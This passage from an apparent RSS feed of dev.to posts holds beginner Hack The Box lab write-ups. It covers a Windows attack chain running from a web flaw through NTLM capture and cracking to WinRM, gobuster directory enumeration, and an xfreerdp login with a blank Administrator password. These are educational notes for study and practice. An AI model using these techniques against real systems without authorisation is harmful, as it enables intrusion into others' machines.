&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because the same vulnerability on a Linux target could potentially lead to a very different attack chain.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Open ports tell you about possible future attack paths&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The initial scan showed both:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;80/tcp
5985/tcp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At first, WinRM wasn’t immediately useful because we didn’t have credentials.&lt;/p&gt;

&lt;p&gt;After obtaining the Administrator password, however, that previously discovered service became the way to obtain a remote shell.&lt;/p&gt;

&lt;p&gt;This reinforced the importance of keeping track of all discovered services, even if they aren’t immediately exploitable.&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;Final Thoughts&lt;/p&gt;

&lt;p&gt;The biggest lesson from this machine was the importance of connecting concepts together.&lt;/p&gt;

&lt;p&gt;A web vulnerability, Windows SMB authentication, NTLM, Responder, password cracking, and WinRM might initially look like completely separate topics.&lt;/p&gt;

&lt;p&gt;But during an actual assessment, they can form one continuous attack chain:&lt;/p&gt;

&lt;p&gt;Web vulnerability → Windows authentication → credential capture → credential recovery → remote access&lt;/p&gt;

&lt;p&gt;That’s the kind of pattern I want to focus on documenting here—not just how to solve a particular machine, but how the pieces fit together and what I can carry forward to the next one.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Preignition</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 08 Sep 2026 22:57:34 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-preignition-517f</link>
      <guid>https://dev.to/zkrnvkf/htb-preignition-517f</guid>
      <description>&lt;p&gt;OS: Linux&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3f8luo7ayzhl40f8jy89.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3f8luo7ayzhl40f8jy89.png" alt=" " width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we find an open TCP port 80, it is worth enumerating the web server for hidden directories and files. These may expose useful endpoints such as /admin, login pages, configuration files, or other functionality that is not immediately visible from the main page.&lt;/p&gt;

&lt;p&gt;One way to perform directory enumeration is with Gobuster.&lt;br&gt;
'gobuster dir -u http:// -w  -x '&lt;/p&gt;

&lt;p&gt;Directory and file enumeration can reveal additional attack surface that is not linked or exposed directly from the main page.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>linux</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Explosion</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Sun, 06 Sep 2026 21:35:53 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-explosion-1fa6</link>
      <guid>https://dev.to/zkrnvkf/htb-explosion-1fa6</guid>
      <description>&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzn1xg2arx6kny1n2z8wp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzn1xg2arx6kny1n2z8wp.png" alt=" " width="557" height="211"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we see a TCP port 3389 is open, trying &lt;strong&gt;xfreerdp&lt;/strong&gt; is a reasonable next step&lt;/p&gt;

&lt;p&gt;One example of command is:&lt;br&gt;
&lt;code&gt;xfreerdp /v:&amp;lt;ip&amp;gt; /u:&amp;lt;username&amp;gt; /p:&amp;lt;password&amp;gt; /cert:ignore&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For this machine, the creator purposely made the password blank so we could log in using Administrator account but usually this is not the case. However, it was my first time coming across &lt;code&gt;xfreerdp&lt;/code&gt; command so it was a still good learning&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
